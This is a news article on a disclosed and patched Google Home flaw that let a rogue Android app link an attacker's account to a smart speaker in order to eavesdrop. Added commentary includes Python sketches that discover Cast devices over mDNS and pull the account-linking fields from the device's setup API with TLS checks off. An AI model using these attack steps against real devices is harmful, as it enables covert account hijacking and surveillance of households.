Google Home Vulnerability: Eavesdropping on Conversations

By Deeba Ahmed

The issue was caused by the software architecture used in Google Home devices.

HackRead

Matt Kunze, an ethical hacker, reported wiretapping bugs in Google Home smart speakers, for which he received a bug bounty worth $107,500.

Google Assistant is currently more popular among smart home owners than Amazon Alexa and Apple Siri, given its superior intuitiveness and ability to hold lengthy conversations. However, according to the latest research, a vulnerability in Google Home smart speakers could allow attackers to take control of the device and eavesdrop on conversations indoors.

Details of the Findings

The vulnerability was identified by Matt Kunze, a security researcher using the moniker DownrightNifty Matt. The researcher revealed that, if exploited, the vulnerability could allow the installation of backdoors and turn Google Home smart speakers into wiretapping devices. Google fixed the issue in April 2021, following responsible disclosure on 8 January 2021 and the development of a proof-of-concept for the company.

Possible Dangers

The vulnerability could let an adversary within the device’s wireless proximity install a backdoor account on the device and then send it remote commands, access its microphone feed, and initiate arbitrary HTTP requests. Malicious requests made within the user’s LAN are especially dangerous because they can expose the device’s Wi-Fi password, giving the attacker direct access to all devices connected to the network.

What Caused the Issue?

Matt discovered that the problem stemmed from the software architecture used in Google Home devices, as it let an adversary add a rogue Google user account to a target’s smart home device.

To make the attack work, a threat actor would first trick the victim into installing a malicious Android application. The app would then detect a Google Home device on the local network and stealthily issue HTTP requests to link the attacker’s account to the victim’s device.
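The article does not say how the rogue app finds the speaker. Google Home devices, like other Cast hardware, advertise themselves on the LAN over mDNS under the standard `_googlecast._tcp.local` service name, so a minimal discovery sketch might look like the following (everything beyond that service name, including the function names, is illustrative):

```python
import socket
import struct

def build_mdns_query(service: str) -> bytes:
    """Build a one-question mDNS PTR query for the given service name."""
    # DNS header: id=0, flags=0, 1 question, no answer/authority/additional records
    header = struct.pack("!6H", 0, 0, 1, 0, 0, 0)
    # Encode the service name as length-prefixed DNS labels, terminated by a zero byte
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in service.split(".")
    ) + b"\x00"
    # QTYPE 12 = PTR, QCLASS 1 = IN
    return header + qname + struct.pack("!HH", 12, 1)

def discover_cast_devices(timeout: float = 3.0) -> None:
    """Send the query to the mDNS multicast group and print responders."""
    query = build_mdns_query("_googlecast._tcp.local")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(query, ("224.0.0.251", 5353))  # well-known mDNS group and port
    try:
        while True:
            data, (addr, _port) = sock.recvfrom(4096)
            print(f"Cast device candidate at {addr} ({len(data)}-byte answer)")
    except socket.timeout:
        pass
    finally:
        sock.close()
```

In practice a malicious app would more likely use the platform’s own service-discovery APIs, which perform the same mDNS exchange under the hood.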

In addition, the attacker could stage a Wi-Fi de-authentication attack to disconnect the Google Home device from the network, forcing the appliance to enter setup mode and create its own open Wi-Fi network. The attacker could then connect to this network and request additional details such as the device name, certificate, and cloud_device_id, and use that information to link their account to the victim’s device.
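According to the researcher’s disclosure, those details come from a local setup API on the device itself. A rough sketch of fetching and picking out the fields the article names could look like this; the endpoint path, port, and the need to skip certificate verification follow the disclosure, and may well differ across firmware versions:

```python
import json
import ssl
import urllib.request

# Endpoint as described in the researcher's disclosure; illustrative only,
# and likely changed by the patch.
SETUP_ENDPOINT = "https://{ip}:8443/setup/eureka_info"

def extract_link_fields(info: dict) -> dict:
    """Pull out the fields the article says are needed to link an account."""
    return {key: info.get(key) for key in ("name", "certificate", "cloud_device_id")}

def fetch_device_info(ip: str) -> dict:
    """Query the local setup API; the device uses a self-signed certificate,
    so TLS verification is disabled for this local request."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    url = SETUP_ENDPOINT.format(ip=ip)
    with urllib.request.urlopen(url, context=ctx, timeout=5) as resp:
        return json.loads(resp.read())
```

Once the attacker holds these fields, the account-linking step itself goes through Google’s cloud APIs rather than the device, which is why the article describes it as adding a rogue Google account.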

According to Matt’s blog post, beyond spying on the victim through the microphone, the attacker could perform a range of actions such as turning the speaker’s volume down to zero or making calls to any phone number. The victim is unlikely to suspect anything: the only visible sign of exploitation is the device’s LED turning blue, which the user would likely attribute to a firmware update.

Matt successfully connected an unknown user account to a Google Home speaker. He created a backdoor account on the targeted device and obtained privileges that let him send remote commands to the Home Mini smart speaker, access its microphone feed, and more. The researcher shared a video demo of the attack.

It is worth noting that there is no evidence this security loophole was exploited in the wild before its detection in 2021. As an ethical hacker, the researcher notified Google about the issue, and it was patched. Matt received a bug bounty worth $107,500 for finding the flaw.

  1. Google Home Mini Secretly Recorded Conversations
  2. Voice assistant devices manipulated with ultrasonic waves
  3. Comcast voice remote control could be turned into a spying tool
  4. Using laser on Alexa and Google home to unlock your front door
  5. DolphinAttack: Voice Assistant Apps Siri and Alexa Can Be Hacked
